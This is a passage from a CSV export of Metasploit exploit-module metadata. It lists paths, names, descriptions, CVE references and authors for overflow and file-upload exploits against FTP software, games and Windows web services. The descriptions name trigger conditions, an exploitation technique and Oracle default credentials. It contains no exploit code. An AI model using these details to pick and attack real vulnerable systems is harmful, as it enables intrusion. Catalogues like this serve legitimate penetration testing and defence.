00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/goldenftp_pass_bof.rb","exploit","windows/ftp/goldenftp_pass_bof","exploit/windows/ftp/goldenftp_pass_bof","GoldenFTP PASS Stack Buffer Overflow",200,"This module exploits a vulnerability in the Golden FTP service, using the PASS command to cause a buffer overflow. Please note that in order trigger the vulnerable code, the victim machine must have the ""Show new connections"" setting enabled. By default, this option is unchecked.","Metasploit Framework License (BSD)","f","2011-01-23 00:00:00",,,"aggressive","t","BID-45957, CVE-2006-6576, EDB-16036, OSVDB-35951","Craig Freyman, Joff Thyer , bannedit " 728,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/httpdx_tolog_format.rb","exploit","windows/ftp/httpdx_tolog_format","exploit/windows/ftp/httpdx_tolog_format","HTTPDX tolog() Function Format String Vulnerability",500,"This module exploits a format string vulnerability in HTTPDX FTP server. By sending an specially crafted FTP command containing format specifiers, an attacker can corrupt memory and execute arbitrary code. By default logging is off for HTTP, but enabled for the 'moderator' user via FTP.","Metasploit Framework License (BSD)","t","2009-11-17 00:00:00",0,,"aggressive","t","CVE-2009-4769, OSVDB-60181","jduck " 729,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/leapftp_list_reply.rb","exploit","windows/ftp/leapftp_list_reply","exploit/windows/ftp/leapftp_list_reply","LeapFTP 3.0.1 Stack Buffer Overflow",400,"This module exploits a buffer overflow in the LeapFTP 3.0.1 client. This issue is triggered when a file with a long name is downloaded/opened.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","OSVDB-68640, URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r , nullthreat" 730,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/leapftp_pasv_reply.rb","exploit","windows/ftp/leapftp_pasv_reply","exploit/windows/ftp/leapftp_pasv_reply","LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow",300,"This module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600 client that is triggered through an excessively long PASV reply command. This module was ported from the original exploit by drG4njubas with minor improvements.","Metasploit Framework License (BSD)","f","2003-06-09 00:00:00",0,,"passive","t","BID-7860, CVE-2003-0558, EDB-54, OSVDB-4587","patrick " 731,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb","exploit","windows/ftp/ms09_053_ftpd_nlst","exploit/windows/ftp/ms09_053_ftpd_nlst","Microsoft IIS FTP Server NLST Response Overflow",500,"This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP service. The flaw is triggered when a special NLST argument is passed while the session has changed into a long directory path. For this exploit to work, the FTP server must be configured to allow write access to the file system (either anonymously or in conjunction with a real account)","Metasploit Framework License (BSD)","t","2009-08-31 00:00:00",0,,"aggressive","t","BID-36189, CVE-2009-3023, EDB-9541, MSB-MS09-053, OSVDB-57589","Kingcope , hdm " 732,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/netterm_netftpd_user.rb","exploit","windows/ftp/netterm_netftpd_user","exploit/windows/ftp/netterm_netftpd_user","NetTerm NetFTPD USER Buffer Overflow",500,"This module exploits a vulnerability in the NetTerm NetFTPD application. This package is part of the NetTerm package. This module uses the USER command to trigger the overflow.","Metasploit Framework License (BSD)","f","2005-04-26 00:00:00",0,,"aggressive","t","BID-13396, CVE-2005-1323, OSVDB-15865, URL-http://seclists.org/lists/fulldisclosure/2005/Apr/0578.html","hdm " 733,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/odin_list_reply.rb","exploit","windows/ftp/odin_list_reply","exploit/windows/ftp/odin_list_reply","Odin Secure FTP 4.1 Stack Buffer Overflow (LIST)",400,"This module exploits a stack buffer overflow in Odin Secure FTP 4.1, triggered when processing the response on a LIST command. During the overflow, a structured exception handler record gets overwritten.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","OSVDB-68824, URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r , rick2600" 734,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb","exploit","windows/ftp/oracle9i_xdb_ftp_pass","exploit/windows/ftp/oracle9i_xdb_ftp_pass","Oracle 9i XDB FTP PASS Overflow (win32)",500,"By passing an overly long string to the PASS command, a stack based buffer overflow occurs. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on ""Variations in exploit methods between Linux and Windows"" presented at the Blackhat conference.","Metasploit Framework License (BSD)","t","2003-08-18 00:00:00",0,,"aggressive","t","BID-8375, CVE-2003-0727, OSVDB-2449, URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf","MC " 735,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb","exploit","windows/ftp/oracle9i_xdb_ftp_unlock","exploit/windows/ftp/oracle9i_xdb_ftp_unlock","Oracle 9i XDB FTP UNLOCK Overflow (win32)",500,"By passing an overly long token to the UNLOCK command, a stack based buffer overflow occurs. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on ""Variations in exploit methods between Linux and Windows"" presented at the Blackhat conference. Oracle9i includes a number of default accounts, including dbsnmp:dbsmp, scott:tiger, system:manager, and sys:change_on_install.","Metasploit Framework License (BSD)","t","2003-08-18 00:00:00",0,,"aggressive","t","BID-8375, CVE-2003-0727, OSVDB-2449, URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf","David Litchfield , MC " 736,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/proftp_banner.rb","exploit","windows/ftp/proftp_banner","exploit/windows/ftp/proftp_banner","ProFTP 2.9 Banner Remote Buffer Overflow",300,"This module exploits a buffer overflow in the ProFTP 2.9 client that is triggered through an excessively long welcome message.","Metasploit Framework License (BSD)","f","2009-08-25 00:00:00",0,,"passive","t","CVE-2009-3976, OSVDB-57394, URL-http://www.labtam-inc.com/index.php?act=products&pid=1","His0k4 " 737,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/quickshare_traversal_write.rb","exploit","windows/ftp/quickshare_traversal_write","exploit/windows/ftp/quickshare_traversal_write","QuickShare File Server 1.2.1 Directory Traversal Vulnerability",600,"This module exploits a vulnerability found in QuickShare File Server's FTP service. By supplying ""../"" in the file path, it is possible to trigger a directory traversal flaw, allowing the attacker to read a file outside the virtual directory. By default, the ""Writable"" option is enabled during account creation, therefore this makes it possible to create a file at an arbitrary location, which leads to remote code execution.","Metasploit Framework License (BSD)","f","2011-02-03 00:00:00",0,,"passive","t","EDB-16105, OSVDB-70776, URL-http://www.digital-echidna.org/2011/02/quickshare-file-share-1-2-1-directory-traversal-vulnerability/, URL-http://www.quicksharehq.com/blog/quickshare-file-server-1-2-2-released.html","modpr0be, sinn3r " 738,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/ricoh_dl_bof.rb","exploit","windows/ftp/ricoh_dl_bof","exploit/windows/ftp/ricoh_dl_bof","Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow",300,"This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP service. By supplying a long string of data to the USER command, it is possible to trigger a stack-based buffer overflow, which allows remote code execution under the context of the user. Please note that in order to trigger the vulnerability, the server must be configured with a log file name (by default, it's disabled).","Metasploit Framework License (BSD)","f","2012-03-01 00:00:00",0,,"aggressive","t","OSVDB-79691, URL-http://secunia.com/advisories/47912, URL-http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/","Julien Ahrens, sinn3r " 739,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/sami_ftpd_list.rb","exploit","windows/ftp/sami_ftpd_list","exploit/windows/ftp/sami_ftpd_list","Sami FTP Server LIST Command Buffer Overflow",100,"This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1. The vulnerability exists in the processing of LIST commands. In order to trigger the vulnerability, the ""Log"" tab must be viewed in the Sami FTP Server managing application, in the target machine. On the other hand, the source IP address used to connect with the FTP Server is needed. If the user can't provide it, the module will try to resolve it. This module has been tested successfully on Sami FTP Server 2.0.1 over Windows XP SP3.","Metasploit Framework License (BSD)","f","2013-02-27 00:00:00",0,,"aggressive","t","BID-58247, EDB-24557, OSVDB-90815","Doug Prostko , superkojiman" 740,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/sami_ftpd_user.rb","exploit","windows/ftp/sami_ftpd_user","exploit/windows/ftp/sami_ftpd_user","KarjaSoft Sami FTP Server v2.02 USER Overflow",300,"This module exploits the KarjaSoft Sami FTP Server version 2.02 by sending an excessively long USER string. The stack is overwritten when the administrator attempts to view the FTP logs. Therefore, this exploit is passive and requires end-user interaction. Keep this in mind when selecting payloads. When the server is restarted, it will re-execute the exploit until the logfile is manually deleted via the file system.","Metasploit Framework License (BSD)","f","2006-01-24 00:00:00",,,"passive","t","BID-16370, BID-17835, BID-22045, CVE-2006-0441, CVE-2006-2212, EDB-1448, EDB-1452, EDB-1462, EDB-3127, EDB-3140, OSVDB-25670","patrick " 741,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/sasser_ftpd_port.rb","exploit","windows/ftp/sasser_ftpd_port","exploit/windows/ftp/sasser_ftpd_port","Sasser Worm avserve FTP PORT Buffer Overflow",200,"This module exploits the FTP server component of the Sasser worm. By sending an overly long PORT command the stack can be overwritten.","Metasploit Framework License (BSD)","f","2004-05-10 00:00:00",1,,"aggressive","t","OSVDB-6197","chamuco , patrick , valsmith " 742,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/scriptftp_list.rb","exploit","windows/ftp/scriptftp_list","exploit/windows/ftp/scriptftp_list","ScriptFTP <= 3.3 Remote Buffer Overflow (LIST)",400,"AmmSoft's ScriptFTP client is susceptible to a remote buffer overflow vulnerability that is triggered when processing a sufficiently long filename during a FTP LIST command resulting in overwriting the exception handler. Social engineering of executing a specially crafted ftp file by double click will result in connecting to our malcious server and perform arbitrary code execution which allows the attacker to gain the same rights as the user running ScriptFTP.","Metasploit Framework License (BSD)","f","2011-10-12 00:00:00",0,,"passive","t","CVE-2011-3976, EDB-17876, OSVDB-75633, US-CERT-VU-440219","TecR0c , modpr0be, mr_me " 743,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/seagull_list_reply.rb","exploit","windows/ftp/seagull_list_reply","exploit/windows/ftp/seagull_list_reply","Seagull FTP v3.3 build 409 Stack Buffer Overflow",400,"This module exploits a buffer overflow in the Seagull FTP client that gets triggered when the ftp clients processes a response to a LIST command. If the response contains an overly long file/folder name, a buffer overflow occurs, overwriting a structured exception handler.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",0,,"passive","t","URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/","corelanc0d3r " 744,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/servu_chmod.rb","exploit","windows/ftp/servu_chmod","exploit/windows/ftp/servu_chmod","Serv-U FTP Server < 4.2 Buffer Overflow",300,"This module exploits a stack buffer overflow in the site chmod command in versions of Serv-U FTP Server prior to 4.2. You must have valid credentials to trigger this vulnerability. Exploitation also leaves the service in a non-functional state.","Metasploit Framework License (BSD)","t","2004-12-31 00:00:00",0,,"aggressive","t","BID-9483, CVE-2004-2111, OSVDB-3713","theLightCosine " 745,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/servu_mdtm.rb","exploit","windows/ftp/servu_mdtm","exploit/windows/ftp/servu_mdtm","Serv-U FTPD MDTM Overflow",400,"This is an exploit for the Serv-U\'s MDTM command timezone overflow. It has been heavily tested against versions 4.0.0.4/4.1.0.0/4.1.0.3/5.0.0.0 with success against nt4/2k/xp/2k3. I have also had success against version 3, but only tested 1 version/os. The bug is in all versions prior to 5.0.0.4, but this exploit will not work against versions not listed above. You only get one shot, but it should be OS/SP independent. This exploit is a single hit, the service dies after the shellcode finishes execution.","Metasploit Framework License (BSD)","f","2004-02-26 00:00:00",0,,"aggressive","t","BID-9751, CVE-2004-0330, OSVDB-4073, URL-http://archives.neohapsis.com/archives/bugtraq/2004-02/0654.html, URL-http://www.cnhonker.com/advisory/serv-u.mdtm.txt, URL-http://www.cnhonker.com/index.php?module=releases&act=view&type=3&id=54","spoonm " 746,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/slimftpd_list_concat.rb","exploit","windows/ftp/slimftpd_list_concat","exploit/windows/ftp/slimftpd_list_concat","SlimFTPd LIST Concatenation Overflow",500,"This module exploits a stack buffer overflow in the SlimFTPd server. The flaw is triggered when a LIST command is received with an overly-long argument. This vulnerability affects all versions of SlimFTPd prior to 3.16 and was discovered by Raphael Rigo.","BSD License","f","2005-07-21 00:00:00",0,,"aggressive","t","BID-14339, CVE-2005-2373, OSVDB-18172","Fairuzan Roslan " 747,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/trellian_client_pasv.rb","exploit","windows/ftp/trellian_client_pasv","exploit/windows/ftp/trellian_client_pasv","Trellian FTP Client 3.01 PASV Remote Buffer Overflow",300,"This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered through an excessively long PASV message.","Metasploit Framework License (BSD)","f","2010-04-11 00:00:00",0,,"passive","t","CVE-2010-1465, EDB-12152, OSVDB-63812","dookie, zombiefx" 748,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/turboftp_port.rb","exploit","windows/ftp/turboftp_port","exploit/windows/ftp/turboftp_port","Turbo FTP Server 1.30.823 PORT Overflow",500,"This module exploits a buffer overflow vulnerability found in the PORT command in Turbo FTP Server 1.30.823 & 1.30.826, which results in remote code execution under the context of SYSTEM.","Metasploit Framework License (BSD)","f","2012-10-03 00:00:00",0,,"aggressive","t","EDB-22161, OSVDB-85887","Lincoln, Zhao Liang, corelanc0d3r, thelightcosine" 749,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/vermillion_ftpd_port.rb","exploit","windows/ftp/vermillion_ftpd_port","exploit/windows/ftp/vermillion_ftpd_port","Vermillion FTP Daemon PORT Command Memory Corruption",500,"This module exploits an out-of-bounds array access in the Arcane Software Vermillion FTP server. By sending an specially crafted FTP PORT command, an attacker can corrupt stack memory and execute arbitrary code. This particular issue is caused by processing data bound by attacker controlled input while writing into a 4 byte stack buffer. Unfortunately, the writing that occurs is not a simple byte copy. Processing is done using a source ptr (p) and a destination pointer (q). The vulnerable function walks the input string and continues while the source byte is non-null. If a comma is encountered, the function increments the the destination pointer. If an ascii digit [0-9] is encountered, the following occurs: *q = (*q * 10) + (*p - '0'); All other input characters are ignored in this loop. As a consequence, an attacker must craft input such that modifications to the current values on the stack result in usable values. In this exploit, the low two bytes of the return address are adjusted to point at the location of a 'call edi' instruction within the binary. This was chosen since 'edi' points at the source buffer when the function returns. NOTE: This server can be installed as a service using ""vftpd.exe install"". If so, the service does not restart automatically, giving an attacker only one attempt.","Metasploit Framework License (BSD)","t","2009-09-23 00:00:00",0,,"aggressive","t","EDB-11293, OSVDB-62163, URL-http://www.global-evolution.info/news/files/vftpd/vftpd.txt","jduck " 750,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/warftpd_165_pass.rb","exploit","windows/ftp/warftpd_165_pass","exploit/windows/ftp/warftpd_165_pass","War-FTPD 1.65 Password Overflow",200,"This exploits the buffer overflow found in the PASS command in War-FTPD 1.65. This particular module will only work reliably against Windows 2000 targets. The server must be configured to allow anonymous logins for this exploit to succeed. A failed attempt will bring down the service completely.","BSD License","f","1998-03-19 00:00:00",0,,"aggressive","t","BID-10078, CVE-1999-0256, OSVDB-875, URL-http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html","hdm " 751,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/warftpd_165_user.rb","exploit","windows/ftp/warftpd_165_user","exploit/windows/ftp/warftpd_165_user","War-FTPD 1.65 Username Overflow",200,"This module exploits a buffer overflow found in the USER command of War-FTPD 1.65.","BSD License","f","1998-03-19 00:00:00",,,"aggressive","t","BID-10078, CVE-1999-0256, OSVDB-875, URL-http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html","Fairuzan Roslan " 752,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/wftpd_size.rb","exploit","windows/ftp/wftpd_size","exploit/windows/ftp/wftpd_size","Texas Imperial Software WFTPD 3.23 SIZE Overflow",200,"This module exploits a buffer overflow in the SIZE verb in Texas Imperial's Software WFTPD 3.23.","Metasploit Framework License (BSD)","t","2006-08-23 00:00:00",0,,"aggressive","t","BID-19617, CVE-2006-4318, OSVDB-28134","MC " 753,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb","exploit","windows/ftp/wsftp_server_503_mkd","exploit/windows/ftp/wsftp_server_503_mkd","WS-FTP Server 5.03 MKD Overflow",500,"This module exploits the buffer overflow found in the MKD command in IPSWITCH WS_FTP Server 5.03 discovered by Reed Arvin.","BSD License","f","2004-11-29 00:00:00",0,,"aggressive","t","BID-11772, CVE-2004-1135, OSVDB-12509","Reed Arvin , et " 754,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb","exploit","windows/ftp/wsftp_server_505_xmd5","exploit/windows/ftp/wsftp_server_505_xmd5","Ipswitch WS_FTP Server 5.05 XMD5 Overflow",200,"This module exploits a buffer overflow in the XMD5 verb in IPSWITCH WS_FTP Server 5.05.","Metasploit Framework License (BSD)","f","2006-09-14 00:00:00",0,,"aggressive","t","BID-20076, CVE-2006-4847, OSVDB-28939","MC " 755,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/xftp_client_pwd.rb","exploit","windows/ftp/xftp_client_pwd","exploit/windows/ftp/xftp_client_pwd","Xftp FTP Client 3.0 PWD Remote Buffer Overflow",300,"This module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered through an excessively long PWD message.","Metasploit Framework License (BSD)","f","2010-04-22 00:00:00",0,,"passive","t","EDB-12332, OSVDB-63968","dookie, zombiefx" 756,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/xlink_client.rb","exploit","windows/ftp/xlink_client","exploit/windows/ftp/xlink_client","Xlink FTP Client Buffer Overflow",300,"This module exploits a stack buffer overflow in Xlink FTP Client 32 Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2. When a overly long FTP server response is recieved by a client, arbitrary code may be executed.","Metasploit Framework License (BSD)","f","2009-10-03 00:00:00",0,,"passive","t","CVE-2006-5792, OSVDB-33969, URL-http://www.metasploit.com/, URL-http://www.xlink.com","MC " 757,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ftp/xlink_server.rb","exploit","windows/ftp/xlink_server","exploit/windows/ftp/xlink_server","Xlink FTP Server Buffer Overflow",400,"This module exploits a stack buffer overflow in Xlink FTP Server that comes bundled with Omni-NFS Enterprise 5.2. When a overly long FTP request is sent to the server, arbitrary code may be executed.","Metasploit Framework License (BSD)","t","2009-10-03 00:00:00",0,,"aggressive","t","CVE-2006-5792, OSVDB-58646, URL-http://www.metasploit.com/, URL-http://www.xlink.com","MC " 758,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/games/mohaa_getinfo.rb","exploit","windows/games/mohaa_getinfo","exploit/windows/games/mohaa_getinfo","Medal Of Honor Allied Assault getinfo Stack Buffer Overflow",500,"This module exploits a stack based buffer overflow in the getinfo command of Medal Of Honor Allied Assault.","BSD License","f","2004-07-17 00:00:00",0,,"aggressive","t","BID-10743, CVE-2004-0735, EDB-357, OSVDB-8061","Jacopo Cervini" 759,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/games/racer_503beta5.rb","exploit","windows/games/racer_503beta5","exploit/windows/games/racer_503beta5","Racer v0.5.3 beta 5 Buffer Overflow",500,"This module explots the Racer Car and Racing Simulator game versions v0.5.3 beta 5 and earlier. Both the client and server listen on UDP port 26000. By sending an overly long buffer we are able to execute arbitrary code remotely.","Metasploit Framework License (BSD)","f","2008-08-10 00:00:00",0,,"aggressive","t","BID-25297, CVE-2007-4370, EDB-4283, OSVDB-39601","Trancek " 760,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/games/ut2004_secure.rb","exploit","windows/games/ut2004_secure","exploit/windows/games/ut2004_secure","Unreal Tournament 2004 ""secure"" Overflow (Win32)",400,"This is an exploit for the GameSpy secure query in the Unreal Engine. This exploit only requires one UDP packet, which can be both spoofed and sent to a broadcast address. Usually, the GameSpy query server listens on port 7787, but you can manually specify the port as well. The RunServer.sh script will automatically restart the server upon a crash, giving us the ability to bruteforce the service and exploit it multiple times.","BSD License","t","2004-06-18 00:00:00",0,,"aggressive","t","BID-10570, CVE-2004-0608, OSVDB-7217","stinko " 761,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/adobe_robohelper_authbypass.rb","exploit","windows/http/adobe_robohelper_authbypass","exploit/windows/http/adobe_robohelper_authbypass","Adobe RoboHelp Server 8 Arbitrary File Upload and Execute",600,"This module exploits an authentication bypass vulnerability which allows remote attackers to upload and execute arbitrary code.","Metasploit Framework License (BSD)","t","2009-09-23 00:00:00",0,,"aggressive","t","CVE-2009-3068, OSVDB-57896, URL-http://www.intevydis.com/blog/?p=69, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-066","MC " 762,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/altn_securitygateway.rb","exploit","windows/http/altn_securitygateway","exploit/windows/http/altn_securitygateway","Alt-N SecurityGateway username Buffer Overflow",200,"Alt-N SecurityGateway is prone to a buffer overflow condition. This is due to insufficient bounds checking on the ""username"" parameter. Successful exploitation could result in code execution with SYSTEM level privileges. NOTE: This service doesn't restart, you'll only get one shot. However, it often survives a successful exploitation attempt.","Metasploit Framework License (BSD)","t","2008-06-02 00:00:00",0,,"aggressive","t","BID-29457, CVE-2008-4193, OSVDB-45854","jduck " 763,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/altn_webadmin.rb","exploit","windows/http/altn_webadmin","exploit/windows/http/altn_webadmin","Alt-N WebAdmin USER Buffer Overflow",200,"Alt-N WebAdmin is prone to a buffer overflow condition. This is due to insufficient bounds checking on the USER parameter. Successful exploitation could result in code execution with SYSTEM level privileges.","Metasploit Framework License (BSD)","t","2003-06-24 00:00:00",0,,"aggressive","t","BID-8024, CVE-2003-0471, OSVDB-2207, URL-http://www.nessus.org/plugins/index.php?view=single&id=11771","MC " 764,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/amlibweb_webquerydll_app.rb","exploit","windows/http/amlibweb_webquerydll_app","exploit/windows/http/amlibweb_webquerydll_app","Amlibweb NetOpacs webquery.dll Stack Buffer Overflow",300,"This module exploits a stack buffer overflow in Amlib's Amlibweb Library Management System (NetOpacs). The webquery.dll API is available through IIS requests. By specifying an overly long string to the 'app' parameter, SeH can be reliably overwritten allowing for arbitrary remote code execution. In addition, it is possible to overwrite EIP by specifying an arbitrary parameter name with an '=' terminator.","Metasploit Framework License (BSD)","t","2010-08-03 00:00:00",0,,"aggressive","t","BID-42293, OSVDB-66814, URL-http://www.aushack.com/advisories/","patrick " 765,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/apache_chunked.rb","exploit","windows/http/apache_chunked","exploit/windows/http/apache_chunked","Apache Win32 Chunked Encoding",400,"This module exploits the chunked transfer integer wrap vulnerability in Apache version 1.2.x to 1.3.24. This particular module has been tested with all versions of the official Win32 build between 1.3.9 and 1.3.24. Additionally, it should work against most co-branded and bundled versions of Apache (Oracle 8i, 9i, IBM HTTPD, etc). You will need to use the Check() functionality to determine the exact target version prior to launching the exploit. The version of Apache bundled with Oracle 8.1.7 will not automatically restart, so if you use the wrong target value, the server will crash.","Metasploit Framework License (BSD)","t","2002-06-19 00:00:00",0,,"aggressive","t","BID-5033, CVE-2002-0392, OSVDB-838, URL-http://lists.insecure.org/lists/bugtraq/2002/Jun/0184.html","hdm , jduck " 766,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb","exploit","windows/http/apache_mod_rewrite_ldap","exploit/windows/http/apache_mod_rewrite_ldap","Apache module mod_rewrite LDAP protocol Buffer Overflow",500,"This module exploits the mod_rewrite LDAP protocol scheme handling flaw discovered by Mark Dowd, which produces an off-by-one overflow. Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable. This module requires REWRITEPATH to be set accurately. In addition, the target must have 'RewriteEngine on' configured, with a specific 'RewriteRule' condition enabled to allow for exploitation. The flaw affects multiple platforms, however this module currently only supports Windows based installations.","Metasploit Framework License (BSD)","t","2006-07-28 00:00:00",0,,"aggressive","t","BID-19204, CVE-2006-3747, EDB-2237, EDB-3680, EDB-3996, OSVDB-27588, URL-http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html","patrick " 767,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/apache_modjk_overflow.rb","exploit","windows/http/apache_modjk_overflow","exploit/windows/http/apache_modjk_overflow","Apache mod_jk 1.2.20 Buffer Overflow",500,"This is a stack buffer overflow exploit for mod_jk 1.2.20. Should work on any Win32 OS.","Metasploit Framework License (BSD)","t","2007-03-02 00:00:00",0,,"aggressive","t","BID-22791, CVE-2007-0774, OSVDB-33855, URL-http://www.zerodayinitiative.com/advisories/ZDI-07-008.html","Nicob " 768,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb","exploit","windows/http/avaya_ccr_imageupload_exec","exploit/windows/http/avaya_ccr_imageupload_exec","Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution",600,"This module exploits an authentication bypass vulnerability on Avaya IP Office Customer Call Reporter, which allows a remote user to upload arbitrary files through the ImageUpload.ashx component. It can be abused to upload and execute arbitrary ASP .NET code. The vulnerability has been tested successfully on Avaya IP Office Customer Call Reporter 7.0.4.2 and 8.0.8.15 on Windows 2003 SP2.","Metasploit Framework License (BSD)","f","2012-06-28 00:00:00",0,,"aggressive","t","BID-54225, CVE-2012-3811, OSVDB-83399, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-106/, URL-https://downloads.avaya.com/css/P8/documents/100164021","juan vazquez , rgod " 769,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/badblue_ext_overflow.rb","exploit","windows/http/badblue_ext_overflow","exploit/windows/http/badblue_ext_overflow","BadBlue 2.5 EXT.dll Buffer Overflow",500,"This is a stack buffer overflow exploit for BadBlue version 2.5.","BSD License","t","2003-04-20 00:00:00",0,,"aggressive","t","BID-7387, CVE-2005-0595, OSVDB-14238","acaro " 770,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/badblue_passthru.rb","exploit","windows/http/badblue_passthru","exploit/windows/http/badblue_passthru","BadBlue 2.72b PassThru Buffer Overflow",500,"This module exploits a stack buffer overflow in the PassThru functionality in ext.dll in BadBlue 2.72b and earlier.","Metasploit Framework License (BSD)","t","2007-12-10 00:00:00",0,,"aggressive","t","BID-26803, CVE-2007-6377, OSVDB-42416","MC " 771,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/bea_weblogic_jsessionid.rb","exploit","windows/http/bea_weblogic_jsessionid","exploit/windows/http/bea_weblogic_jsessionid","BEA WebLogic JSESSIONID Cookie Value Overflow",400,"This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable code is only accessible when clustering is configured. A request containing a long JSESSION cookie value can lead to arbirtary code execution.","Metasploit Framework License (BSD)","t","2009-01-13 00:00:00",1,,"aggressive","t","CVE-2008-5457, OSVDB-51311","pusscat " 772,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/bea_weblogic_post_bof.rb","exploit","windows/http/bea_weblogic_post_bof","exploit/windows/http/bea_weblogic_post_bof","Oracle Weblogic Apache Connector POST Request Buffer Overflow",500,"This module exploits a stack based buffer overflow in the BEA Weblogic Apache plugin. The connector fails to properly handle specially crafted HTTP POST requests, resulting a buffer overflow due to the insecure usage of sprintf. Currently, this module works over Windows systems without DEP, and has been tested with Windows 2000 / XP. In addition, the Weblogic Apache plugin version is fingerprinted with a POST request containing a specially crafted Transfer-Encoding header.","Metasploit Framework License (BSD)","t","2008-07-17 00:00:00",0,,"aggressive","t","BID-30273, CVE-2008-3257, OSVDB-47096","KingCope, juan vazquez " 773,"2013-05-07 